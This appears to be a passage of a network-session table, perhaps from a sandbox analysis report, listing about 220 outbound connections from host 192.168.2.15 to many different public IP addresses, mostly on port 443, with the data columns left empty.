                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15189192.168.2.1538664126.233.118.28443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15190192.168.2.155449651.139.76.243443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15191192.168.2.1548030117.236.166.112443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15192192.168.2.1537640169.42.136.66443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15193192.168.2.1537302210.74.161.57443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15194192.168.2.1533106171.204.214.254443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15195192.168.2.1536028123.241.156.199443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15196192.168.2.154178485.114.102.131443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15197192.168.2.156092698.232.164.189443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15198192.168.2.154787024.180.67.188443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15199192.168.2.1535808162.193.130.37443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15200192.168.2.153905484.250.223.245443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15201192.168.2.155783291.196.58.115443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15202192.168.2.155071072.64.78.101443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15203192.168.2.1534966211.127.81.162443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15204192.168.2.155436831.31.192.131443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15205192.168.2.154157897.155.183.143443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15206192.168.2.1541354211.37.228.179443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15207192.168.2.15328048.86.114.238443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15208192.168.2.1542922109.99.82.43443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15209192.168.2.1551804183.107.176.138443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15210192.168.2.1551626108.2.62.115443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15211192.168.2.1541120160.97.110.159443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15212192.168.2.155845059.242.179.17443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15213192.168.2.1550486147.94.227.241443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15214192.168.2.1543620144.164.205.173443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15215192.168.2.1559670162.22.146.123443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15216192.168.2.1540320101.75.249.94443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15217192.168.2.1543994205.175.88.216443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15218192.168.2.1545236105.22.148.181443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15219192.168.2.1536960189.149.173.176443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15220192.168.2.1537678131.62.56.201443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15221192.168.2.154705284.181.69.159443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15222192.168.2.15461109.15.238.213443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15223192.168.2.15599268.28.25.93443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15224192.168.2.1560344186.99.70.23443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15225192.168.2.154133870.198.129.201443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15226192.168.2.1538472181.145.174.184443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15227192.168.2.1545336111.70.30.242443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15228192.168.2.156097819.210.23.41443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15229192.168.2.153676495.76.166.157443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15230192.168.2.1549908198.111.54.144443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15231192.168.2.153769099.27.50.129443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15232192.168.2.1533632195.93.116.248443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15233192.168.2.1551124195.162.86.56443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15234192.168.2.155107449.119.84.82443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15235192.168.2.1558362175.204.15.79443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15236192.168.2.154446495.72.17.132443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15237192.168.2.1539534197.78.197.67443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15238192.168.2.1546882219.230.214.36443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15239192.168.2.155690240.63.113.23443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15240192.168.2.153783091.244.62.245443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15241192.168.2.154436042.195.88.74443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15242192.168.2.1548910163.27.224.82443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15243192.168.2.154263690.146.183.71443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15244192.168.2.15569008.48.82.221443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15245192.168.2.1534088154.18.107.24443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15246192.168.2.1548630189.246.111.220443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15247192.168.2.153996427.76.236.50443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15248192.168.2.154084463.75.214.50443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15249192.168.2.1551600166.184.156.139443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15250192.168.2.1558216220.6.207.95443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15251192.168.2.1534526208.208.90.63443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15252192.168.2.155814445.10.39.198443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15253192.168.2.1555858144.126.207.17443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15254192.168.2.1542810110.30.5.239443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15255192.168.2.1537356156.16.116.90443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15256192.168.2.1542482159.215.152.31443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15257192.168.2.154321472.209.168.161443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15258192.168.2.154391258.58.187.239443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15259192.168.2.1542634130.26.43.109443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15260192.168.2.153678878.170.67.69443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15261192.168.2.1556766199.225.115.34443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15262192.168.2.1548216110.209.227.225443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15263192.168.2.1547692120.190.227.218443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15264192.168.2.154868017.110.130.155443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15265192.168.2.15596684.175.176.2548080
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15266192.168.2.155731653.72.46.43443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15267192.168.2.153741623.49.108.18443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15268192.168.2.154362643.215.204.27443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15269192.168.2.1553408156.47.37.33443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15270192.168.2.1537866185.227.63.174443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15271192.168.2.1539332220.211.28.135443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15272192.168.2.154083642.189.203.229443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15273192.168.2.154320652.4.159.179443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15274192.168.2.1548490138.4.111.111443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15275192.168.2.1536164108.187.103.230443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15276192.168.2.1557842145.92.110.146443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15277192.168.2.1557520149.93.106.69443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15278192.168.2.1541512111.109.155.41443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15279192.168.2.153395014.112.219.91443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15280192.168.2.1559092161.196.34.94443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15281192.168.2.1552922166.205.231.157443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15282192.168.2.1540874105.213.199.196443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15283192.168.2.1546152112.181.148.54443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15284192.168.2.155176890.239.247.126443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15285192.168.2.1551526143.150.114.156443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15286192.168.2.1539580183.164.90.46443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15287192.168.2.153508447.226.209.104443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15288192.168.2.1549100181.33.19.27443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15289192.168.2.154301841.242.51.252443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15290192.168.2.154889894.231.61.112443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15291192.168.2.1537372109.56.243.58443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15292192.168.2.1533022159.164.246.255443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15293192.168.2.1559774111.15.109.99443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15294192.168.2.1551728187.122.58.160443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15295192.168.2.1542842204.131.110.227443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15296192.168.2.1552628197.147.157.179443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15297192.168.2.155928488.33.123.216443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15298192.168.2.154316235.227.203.78443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15299192.168.2.1549032117.143.228.43443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15300192.168.2.1556596197.219.139.66443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15301192.168.2.1544832174.196.200.236443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15302192.168.2.1558792148.85.185.184443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15303192.168.2.153571684.219.47.185443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15304192.168.2.155624295.13.245.40443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15305192.168.2.1553866195.151.49.51443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15306192.168.2.154881077.104.128.198443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15307192.168.2.1549740128.21.240.80443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15308192.168.2.155041857.101.247.51443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15309192.168.2.1536336203.51.239.164443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15310192.168.2.1555608185.39.80.173443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15311192.168.2.154343098.187.125.243443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15312192.168.2.153904034.128.143.208443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15313192.168.2.1532822147.84.110.132443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15314192.168.2.153387680.181.155.64443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15315192.168.2.1551330105.149.241.253443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15316192.168.2.1552402195.187.99.87443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15317192.168.2.1544498181.135.139.131443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15318192.168.2.1557386201.249.138.191443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15319192.168.2.1557014185.58.252.236443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15320192.168.2.153748268.1.154.18443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15321192.168.2.1556564151.68.145.56443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15322192.168.2.1542678113.91.61.171443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15323192.168.2.1537536119.37.176.128443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15324192.168.2.154000254.102.73.24443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15325192.168.2.15459585.66.106.13443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15326192.168.2.154132264.253.132.211443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15327192.168.2.1553994165.65.152.48443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15328192.168.2.1539790207.88.89.178443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15329192.168.2.153746254.72.152.199443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15330192.168.2.155673617.123.33.91443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15331192.168.2.1541544202.159.130.169443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15332192.168.2.155391014.140.54.122443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15333192.168.2.155759866.147.84.154443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15334192.168.2.1541012221.212.251.122443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15335192.168.2.155250665.226.237.22443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15336192.168.2.1559282202.12.44.79443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15337192.168.2.1534086163.231.101.95443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15338192.168.2.1554320199.234.124.255443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15339192.168.2.155006885.241.114.59443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15340192.168.2.154763647.175.109.122443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15341192.168.2.1558178171.25.165.13443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15342192.168.2.1550908109.42.228.132443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15343192.168.2.154675284.75.59.92443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15344192.168.2.1557102201.255.217.43443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15345192.168.2.154039051.56.122.131443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15346192.168.2.1540904175.128.100.235443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15347192.168.2.1556936186.222.74.108443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15348192.168.2.1559484223.143.150.20443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15349192.168.2.154242279.44.129.113443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15350192.168.2.153929818.119.119.146443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15351192.168.2.1547176146.134.103.43443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15352192.168.2.153395684.4.85.199443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15353192.168.2.1556084195.161.202.223443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15354192.168.2.154713895.220.74.84443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15355192.168.2.155352847.143.204.187443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15356192.168.2.153530681.156.216.2443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15357192.168.2.1540876123.248.17.241443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15358192.168.2.1542596199.71.150.13443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15359192.168.2.153890298.43.160.176443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15360192.168.2.154568637.231.5.144443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15361192.168.2.1540080157.5.198.158443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15362192.168.2.1552514114.219.203.249443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15363192.168.2.1535934223.249.173.232443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15364192.168.2.155637294.35.231.54443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15365192.168.2.155358031.79.240.101443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15366192.168.2.1541036175.7.254.225443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15367192.168.2.1559646208.119.199.69443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15368192.168.2.153584061.29.187.12443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15369192.168.2.1542164129.10.192.85443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15370192.168.2.1533974124.160.83.118443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15371192.168.2.15577925.8.194.51443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15372192.168.2.155992260.186.2.3443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15373192.168.2.1534984131.181.7.86443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15374192.168.2.155483453.3.62.57443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15375192.168.2.155034657.253.136.146443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15376192.168.2.1545182216.68.124.124443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15377192.168.2.1555082198.56.104.235443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15378192.168.2.1558678137.15.102.25443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15379192.168.2.155217076.182.41.46443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15380192.168.2.154876894.226.72.96443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15381192.168.2.154427631.59.150.30443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15382192.168.2.155949658.122.131.119443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15383192.168.2.1559804124.6.74.32443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15384192.168.2.154586065.82.130.195443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15385192.168.2.1543888148.227.126.182443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15386192.168.2.153870494.90.213.138443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15387192.168.2.1537272205.81.51.240443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15388192.168.2.1543400199.150.252.81443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15389192.168.2.153882858.129.32.165443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15390192.168.2.155117837.79.104.132443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15391192.168.2.1536364173.122.10.249443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15392192.168.2.15601228.187.82.199443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15393192.168.2.1534724100.185.170.253443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15394192.168.2.1554062177.115.139.37443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15395192.168.2.1535752101.78.208.13443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15396192.168.2.153843450.102.113.147443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15397192.168.2.1539886139.115.220.105443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15398192.168.2.155766846.167.195.222443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15399192.168.2.1545500220.179.20.196443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15400192.168.2.1542576222.7.10.252443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15401192.168.2.1556304166.78.172.203443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15402192.168.2.1534470140.119.194.213443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15403192.168.2.154288212.24.34.237443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15404192.168.2.1548540185.173.208.86443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15405192.168.2.1539918206.247.160.19443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15406192.168.2.1558224118.199.103.239443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15407192.168.2.1542794124.130.178.7443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15408192.168.2.1551098219.207.63.164443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15409192.168.2.1549316204.188.83.171443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
